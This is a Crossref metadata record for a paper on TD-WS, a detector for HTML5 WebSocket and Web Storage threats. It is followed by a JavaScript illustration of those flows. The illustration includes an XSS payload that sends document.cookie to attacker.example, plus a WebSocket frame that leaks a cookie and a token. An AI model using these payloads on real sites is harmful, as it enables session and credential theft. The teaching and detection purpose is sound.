
{"status":"ok","message-type":"work","message-version":"1.0.0","message":{"indexed":{"date-parts":[[2024,8,8]],"date-time":"2024-08-08T11:50:57Z","timestamp":1723117857602},"reference-count":39,"publisher":"Wiley","issue":"18","license":[{"start":{"date-parts":[[2016,11,27]],"date-time":"2016-11-27T00:00:00Z","timestamp":1480204800000},"content-version":"vor","delay-in-days":0,"URL":"http:\/\/onlinelibrary.wiley.com\/termsAndConditions#vor"}],"funder":[{"DOI":"10.13039\/501100001809","name":"National Natural Science Foundation of China","doi-asserted-by":"publisher","award":["61672543","61173169"],"award-info":[{"award-number":["61672543","61173169"]}],"id":[{"id":"10.13039\/501100001809","id-type":"DOI","asserted-by":"publisher"}]}],"content-domain":{"domain":[],"crossmark-restriction":false},"short-container-title":["Security Comm Networks"],"published-print":{"date-parts":[[2016,12]]},"abstract":"<jats:title>Abstract<\/jats:title><jats:p>The new features of HTML5 greatly increase the convenience for both web developers and users, but they also bring new security threats. Although the web\u2010security community has started to analyze the security threats brought by HTML5, little has been done to address the security threats for client\u2010side applications. This paper studies security issues of two popular client\u2010side primitives: WebSocket and Web Storage. The security threats concerned in this paper are private information theft through WebSocket and cross\u2010site scripting vulnerabilities caused by lack of sanitization for WebSocket messages and Web Storage data. We analyze the unsafe data flows of these two HTML5 primitives in detail. Based on that, we present a threat detection tool called TD\u2010WS, which can automatically detect the privacy leaks and the cross\u2010site scripting vulnerabilities in WebSocket and Web Storage applications. 
The results show that TD\u2010WS effectively detects the security threats of WebSocket and Web Storage applications. Copyright \u00a9 2016 John Wiley &amp; Sons, Ltd.<\/jats:p>","DOI":"10.1002\/sec.1708","type":"journal-article","created":{"date-parts":[[2016,11,28]],"date-time":"2016-11-28T02:46:45Z","timestamp":1480301205000},"page":"5432-5443","source":"Crossref","is-referenced-by-count":4,"title":["TD\u2010WS: a threat detection tool of WebSocket and Web Storage in HTML5 websites"],"prefix":"10.1002","volume":"9","author":[{"given":"Junyang","family":"Bai","sequence":"first","affiliation":[{"name":"School of Information Science and Engineering Central South University  Changsha Hunan 410083 China"}],"role":[{"role":"author","vocabulary":"crossref"}]},{"given":"Weiping","family":"Wang","sequence":"additional","affiliation":[{"name":"School of Information Science and Engineering Central South University  Changsha Hunan 410083 China"}],"role":[{"role":"author","vocabulary":"crossref"}]},{"given":"Mingming","family":"Lu","sequence":"additional","affiliation":[{"name":"School of Information Science and Engineering Central South University  Changsha Hunan 410083 China"}],"role":[{"role":"author","vocabulary":"crossref"}]},{"given":"Haodong","family":"Wang","sequence":"additional","affiliation":[{"name":"Department of Electrical Engineering and Computer Science Cleveland State University  Cleveland 44115 OH U.S.A."}],"role":[{"role":"author","vocabulary":"crossref"}]},{"given":"Jianxin","family":"Wang","sequence":"additional","affiliation":[{"name":"School of Information Science and Engineering Central South University  Changsha Hunan 410083 China"}],"role":[{"role":"author","vocabulary":"crossref"}]}],"member":"311","published-online":{"date-parts":[[2016,11,27]]},"reference":[{"key":"e_1_2_9_2_1","doi-asserted-by":"crossref","unstructured":"HeiderichM NiemietzM SchusterF HolzT SchwenkJ.Scriptless attacks: stealing the pie without touching the sill.Proceedings of ACM 
Conference on Computer and Communications Security (CCS) Raleigh NC USA 2012;760\u2013771.","DOI":"10.1145\/2382196.2382276"},{"key":"e_1_2_9_3_1","doi-asserted-by":"crossref","unstructured":"KotcherR PeiY JumdeP JacksonC.Cross\u2010origin pixel stealing: timing attacks using CSS filters.Proceedings of ACM Conference on Computer and Communications Security (CCS) Berlin Germany 2013;1055\u20131062.","DOI":"10.1145\/2508859.2516712"},{"key":"e_1_2_9_4_1","unstructured":"SchneiderC.Cross\u2010site WebSocket hijacking. Available from:http\/\/www.christian-schneider.net\/ CrossSiteWebSocketHijacking.html [accessed on October 2015]."},{"key":"e_1_2_9_5_1","unstructured":"TriveroA.Abusing HTML 5 structured client\u2010side storage. Available from:http:\/\/packetstorm.orionhosting.co. uk\/papers\/general\/html5whitepaper.pdf [accessed on October 2015]."},{"key":"e_1_2_9_6_1","unstructured":"HannaS ShinR AkhaweD BoehmA SaxenaP SongD.The emperors new APIs: on the (in) secure usage of new client\u2010side primitives.Proceedings of Workshop on Web 2.0 Security and Privacy (W2SP) Oakland CA USA 2010."},{"key":"e_1_2_9_7_1","unstructured":"SonS ShmatikovV.The postman always rings twice: attacking and defending postMessage in HTML5 websites.Proceedings of Annual Symposium on Network & Distributed System Security (NDSS) San Diego CA USA 2013."},{"key":"e_1_2_9_8_1","doi-asserted-by":"crossref","unstructured":"TianY LiuYC BhosaleA HuangLS TagueP JacksonC.All your screens are belong to us: attacks exploiting the HTML5 screen sharing API.Proceedings of IEEE Symposium on Security and Privacy (S&P) San Jose CA USA 2014;34\u201348.","DOI":"10.1109\/SP.2014.10"},{"key":"e_1_2_9_9_1","doi-asserted-by":"crossref","unstructured":"LeeS KimH KimJ.Identifying cross\u2010origin resource status using application cache.Proceedings of Annual Symposium on Network & Distributed System Security (NDSS) San Diego CA USA 
2015.","DOI":"10.14722\/ndss.2015.23027"},{"key":"e_1_2_9_10_1","doi-asserted-by":"crossref","unstructured":"JovanovicN KruegelC KirdaE..Pixy: A static analysis tool for detecting web application vulnerabilities.Proceedings of IEEE Symposium on Security and Privacy (S&P) Oakland CA USA 2006;258\u2013263.","DOI":"10.1109\/SP.2006.29"},{"key":"e_1_2_9_11_1","unstructured":"VogtP NentwichF JovanovicN KirdaE KruegelC VignaG.Cross site scripting prevention with dynamic data tainting and static analysis.Proceedings of Annual Symposium on Network & Distributed System Security (NDSS) San Diego CA USA 2007."},{"key":"e_1_2_9_12_1","doi-asserted-by":"publisher","DOI":"10.1145\/1273442.1250739"},{"key":"e_1_2_9_13_1","doi-asserted-by":"crossref","unstructured":"WassermannG SuZ.Static detection of cross\u2010site scripting vulnerabilities.Proceedings of ACM\/IEEE International Conference on Software Engineering (ICSE) Leipzig Germany 2008;171\u2013180.","DOI":"10.1145\/1368088.1368112"},{"key":"e_1_2_9_14_1","doi-asserted-by":"crossref","unstructured":"BalzarottiD CovaM FelmetsgerV JovanovicN KirdaE KruegelC VignaG.Saner: Composing static and dynamic analysis to validate sanitization in web applications.Proceedings of IEEE Symposium on Security and Privacy (S&P) Oakland CA USA 2008;387\u2013401.","DOI":"10.1109\/SP.2008.22"},{"key":"e_1_2_9_15_1","unstructured":"FetteI MelnikovA.The WebSocket Protocol. Available from:http:\/\/tools.ietf.org\/html\/rfc6455 [accessed on September 2015]."},{"key":"e_1_2_9_16_1","unstructured":"AnneVK AryehG AlexR RobinB.W3C DOM4. Available from:https:\/\/www.w3.org\/TR\/dom\/ [accessed on February 2016.]"},{"key":"e_1_2_9_17_1","unstructured":"IanH.Web Storage. 
Available from:https:\/\/www.w3.org\/TR\/webstorage\/ [accessed on September 2015]."},{"key":"e_1_2_9_18_1","doi-asserted-by":"publisher","DOI":"10.1145\/1543135.1542483"},{"key":"e_1_2_9_19_1","unstructured":"SaxenaP HannaS PoosankamP SongD.FLAX: Systematic discovery of client\u2010side validation vulnerabilities in rich web applications.Proceedings of Annual Symposium on Network & Distributed System Security (NDSS) San Diego CA USA 2010."},{"key":"e_1_2_9_20_1","unstructured":"Di PaolaS.DominatorPro: securing next generation of web applications. Avialable from:https:\/\/dominator. mindedsecurity.com [accessed on September 2015.]"},{"key":"e_1_2_9_21_1","doi-asserted-by":"crossref","unstructured":"LekiesS StockB JohnsM.25 million flows later: large\u2010scale detection of DOM\u2010based XSS.Proceedings of ACM Conference on Computer and Communications Security (CCS) Berlin Germany 2013;1193\u20131204.","DOI":"10.1145\/2508859.2516703"},{"key":"e_1_2_9_22_1","unstructured":"WangW BaiJ ZhangY WangJ.Dynamic data tainting on JavaScript based on code rewritten.Proceedings of Conference on Vulnerability Analysis and Risk Assessment (VARA) Beijing China 2015."},{"key":"e_1_2_9_23_1","doi-asserted-by":"publisher","DOI":"10.1109\/JSAC.2002.806121"},{"key":"e_1_2_9_24_1","doi-asserted-by":"crossref","unstructured":"ClauseJ LiW OrsoA.Dytan: a generic dynamic taint analysis framework.Proceedings of International Symposium on Software Testing and Analysis (ISSTA) London UK 2007;196\u2013206.","DOI":"10.1145\/1273463.1273490"},{"key":"e_1_2_9_25_1","doi-asserted-by":"publisher","DOI":"10.1145\/2619091"},{"key":"e_1_2_9_26_1","unstructured":"NewsomeJ SongD.Dynamic taint analysis for automatic detection analysis and signature generation of exploits on commodity software 2005."},{"key":"e_1_2_9_27_1","doi-asserted-by":"crossref","unstructured":"QinF WangC LiZ KimHS ZhouY WuY.Lift: a low\u2010overhead practical information flow tracking system for detecting security 
attacks.Proceedings of Annual IEEE\/ACM International Symposium on Microarchitecture (MICRO) Barcelona Spain 2006;135\u2013148.","DOI":"10.1109\/MICRO.2006.29"},{"key":"e_1_2_9_28_1","doi-asserted-by":"crossref","unstructured":"YinH SongD EgeleM KruegelC KirdaE.Panorama: capturing system\u2010wide information flow for malware detection and analysis.Proceedings of ACM Conference on Computer and Communications Security (CCS) Alexandria VA USA 2007;116\u2013127.","DOI":"10.1145\/1315245.1315261"},{"key":"e_1_2_9_29_1","doi-asserted-by":"crossref","unstructured":"JinX HuX YingK DuW YinH PeriGN.Code injection attacks on HTML5\u2010based mobile apps: characterization detection and mitigation.Proceedings of ACM Conference on Computer and Communications Security (CCS) Scottsdale AZ USA 2014;66\u201377.","DOI":"10.1145\/2660267.2660275"},{"key":"e_1_2_9_30_1","unstructured":"DeFreezD ShastryB ChenH SeifertJP.A first look at Firefox OS security.Proceedings of Workshop on Mobile Security Technologies (MoST) San Jose CA USA 2014."},{"key":"e_1_2_9_31_1","unstructured":"GuarnieriS LivshitsVB.GATEKEEPER: mostly static enforcement of security and reliability policies for JavaScript Code.Proceedings of USENIX Security Symposium Montreal Canada 2009;78\u201385."},{"key":"e_1_2_9_32_1","doi-asserted-by":"crossref","unstructured":"GuarnieriS PistoiaM TrippO DolbyJ TeilhetS BergR.Saving the world wide web from vulnerable JavaScript.Proceedings of International Symposium on Software Testing and Analysis (ISSTA) Toronto ON Canada 2011;177\u2013187.","DOI":"10.1145\/2001420.2001442"},{"key":"e_1_2_9_33_1","doi-asserted-by":"crossref","unstructured":"LiZ ZhangK WangX.Mash\u2010IF: practical information\u2010flow control within client\u2010side mashups.Proceedings of IEEE\/IFIP International Conference on Dependable Systems and Networks (DSN) Chicago IL USA 2010;251\u2013260.","DOI":"10.1109\/DSN.2010.5544312"},{"key":"e_1_2_9_34_1","doi-asserted-by":"crossref","unstructured":"DevrieseD 
PiessensF.Noninterference through secure multi\u2010execution.Proceedings of IEEE Symposium on Security and Privacy (S&P) Oakland CA USA 2010;109\u2013124.","DOI":"10.1109\/SP.2010.15"},{"key":"e_1_2_9_35_1","doi-asserted-by":"publisher","DOI":"10.1145\/2103621.2103677"},{"key":"e_1_2_9_36_1","doi-asserted-by":"crossref","unstructured":"HedinD SabelfeldA.Information\u2010flow security for a core of JavaScript.Proceedings of IEEE Symposium on Computer Security Foundations (CSF) Cambridge MA USA 2012;3\u201318.","DOI":"10.1109\/CSF.2012.19"},{"key":"e_1_2_9_37_1","first-page":"505","article-title":"Isolating JavaScript with filters, rewriting, and wrappers","author":"Maffeis S","year":"2009","journal-title":"Computer Security"},{"key":"e_1_2_9_38_1","doi-asserted-by":"crossref","unstructured":"AkhaweD LiF HeW SaxenaP SongD.Data\u2010confined html5 applications.Proceedings of European Symposium on Research in Computer Security (ESORICS) RHUL Egham U.K. 2013;736\u2013754.","DOI":"10.1007\/978-3-642-40203-6_41"},{"key":"e_1_2_9_39_1","unstructured":"AkhaweD SaxenaP SongD.Privilege separation in HTML5 applications.Proceedings of USENIX Security Symposium Bellevue WA USA 2012;429\u2013444."},{"key":"e_1_2_9_40_1","doi-asserted-by":"crossref","unstructured":"JinX WangL LuoT DuW.Fine\u2010grained access control for HTML5\u2010based mobile applications in android.Proceedings of Information Security Conference (ISC) Dallas TX USA 2013;309\u2013318.","DOI":"10.1007\/978-3-319-27659-5_22"}],"container-title":["Security and Communication 
Networks"],"original-title":[],"language":"en","link":[{"URL":"https:\/\/api.wiley.com\/onlinelibrary\/tdm\/v1\/articles\/10.1002%2Fsec.1708","content-type":"application\/pdf","content-version":"vor","intended-application":"text-mining"},{"URL":"https:\/\/api.wiley.com\/onlinelibrary\/tdm\/v1\/articles\/10.1002%2Fsec.1708","content-type":"unspecified","content-version":"vor","intended-application":"text-mining"},{"URL":"https:\/\/onlinelibrary.wiley.com\/doi\/pdf\/10.1002\/sec.1708","content-type":"unspecified","content-version":"vor","intended-application":"similarity-checking"}],"deposited":{"date-parts":[[2023,9,2]],"date-time":"2023-09-02T19:46:10Z","timestamp":1693683970000},"score":1,"resource":{"primary":{"URL":"https:\/\/onlinelibrary.wiley.com\/doi\/10.1002\/sec.1708"}},"subtitle":[],"short-title":[],"issued":{"date-parts":[[2016,11,27]]},"references-count":39,"journal-issue":{"issue":"18","published-print":{"date-parts":[[2016,12]]}},"alternative-id":["10.1002\/sec.1708"],"URL":"https:\/\/doi.org\/10.1002\/sec.1708","archive":["Portico"],"relation":{},"ISSN":["1939-0114","1939-0122"],"issn-type":[{"value":"1939-0114","type":"print"},{"value":"1939-0122","type":"electronic"}],"subject":[],"published":{"date-parts":[[2016,11,27]]}}}
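The abstract above names two unsafe client-side data flows: untrusted WebSocket messages and Web Storage values reaching an HTML sink without sanitization (DOM-based XSS), and private data leaving the page over a WebSocket (privacy leak). The following is an added illustration of those flows, written for this record; it is not code from the paper and does not reproduce how TD-WS works. The DOM element and the WebSocket are replaced by minimal stand-ins so the script runs under Node.js, and the message payload, the storage entries, the cookie value and the hosts `app.example` / `attacker.example` are all constructed for the example.

```javascript
// Added example, not code from the paper or from the TD-WS tool. It models the
// two client-side data flows the abstract describes:
//   (1) untrusted input (a WebSocket message, a Web Storage value) reaching an
//       HTML sink without sanitization -> DOM-based XSS;
//   (2) private data (cookie, stored token) leaving the page over a WebSocket
//       opened to a host the page should not be talking to -> privacy leak.
// The DOM and WebSocket are replaced by minimal stand-ins so it runs in Node.

// Stand-in for a DOM element: remembers the last markup/text written to it.
function makeElement() {
  return { innerHTML: "", textContent: "" };
}

// Stand-in for a browser WebSocket: records outgoing frames instead of sending.
class RecordingWebSocket {
  constructor(url) { this.url = url; this.sent = []; }
  send(data) { this.sent.push(String(data)); }
}

// Crude, example-only check: does markup written to innerHTML contain a tag
// that the parser would treat as executable (a <script> element, an on* event
// handler attribute inside a tag, or a javascript: URL)? Escaped text such as
// "&lt;svg onload=..." has no tag context and therefore does not match.
const EXECUTABLE = /<(script\b|[a-z]+[^>]*\son\w+\s*=)|javascript:/i;
function wouldExecute(html) { return EXECUTABLE.test(html); }

// Standard HTML entity escaping for the five significant characters.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Constructed inputs (hypothetical, for this example only):
//  - a WebSocket frame from a malicious peer on a chat-style channel;
//  - a localStorage entry an attacker planted earlier (Web Storage is shared by
//    every page on the origin, so one injection persists for all of them).
const WS_MESSAGE = { data: '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">' };
const STORAGE = new Map([
  ["lastSearch", '<svg onload="alert(document.domain)">'],
  ["authToken", "tok_4e1b0c9d"],
]);
const COOKIE = "session=2b7a9f0c";

// Flow (1), vulnerable: source -> innerHTML with no sanitization.
function renderVulnerable(msg, storage) {
  const chat = makeElement();
  chat.innerHTML = msg.data;                            // WebSocket -> innerHTML
  const hint = makeElement();
  hint.innerHTML = storage.get("lastSearch") ?? "";     // Web Storage -> innerHTML
  return { chat, hint };
}

// Flow (1), hardened: same sources, written as text or escaped before use as markup.
function renderHardened(msg, storage) {
  const chat = makeElement();
  chat.textContent = msg.data;                          // text node, never parsed as HTML
  const hint = makeElement();
  hint.innerHTML = "<b>" + escapeHtml(storage.get("lastSearch") ?? "") + "</b>";
  return { chat, hint };
}

// Flow (2): a "status" feature that serialises private values into a frame.
// Whether this is a leak depends on where the socket points.
function sendStatus(ws, storage, cookie) {
  ws.send(JSON.stringify({ cookie, token: storage.get("authToken") }));
}

// Detection for flow (2): which private values appeared in frames sent to a
// host outside the allow-list?
function findLeaks(ws, secrets, allowedHosts) {
  const host = new URL(ws.url).host;
  if (allowedHosts.includes(host)) return [];
  return Object.entries(secrets)
    .filter(([, value]) => ws.sent.some((frame) => frame.includes(value)))
    .map(([name]) => name);
}

// Run both flows end to end and report the outcome of each variant.
function demo() {
  const vuln = renderVulnerable(WS_MESSAGE, STORAGE);
  const safe = renderHardened(WS_MESSAGE, STORAGE);

  const good = new RecordingWebSocket("wss://app.example/status");
  // e.g. a socket URL taken from location.hash or a postMessage, attacker-chosen
  const bad = new RecordingWebSocket("wss://attacker.example/collect");
  sendStatus(good, STORAGE, COOKIE);
  sendStatus(bad, STORAGE, COOKIE);
  const secrets = { cookie: COOKIE, authToken: STORAGE.get("authToken") };

  return {
    xssVulnerable: wouldExecute(vuln.chat.innerHTML) || wouldExecute(vuln.hint.innerHTML),
    xssHardened: wouldExecute(safe.chat.innerHTML) || wouldExecute(safe.hint.innerHTML),
    leaksToAllowed: findLeaks(good, secrets, ["app.example"]),
    leaksToAttacker: findLeaks(bad, secrets, ["app.example"]),
  };
}

console.log(demo());
```

The point of the two render functions is that the sink, not the source, decides the outcome: the same WebSocket frame and the same storage value are harmless once they are written through `textContent` or escaped before reaching `innerHTML`. The leak check is deliberately simple (string containment against an allow-list of hosts); a flow-based detector such as the one the paper describes tracks the value from its source rather than searching frames after the fact.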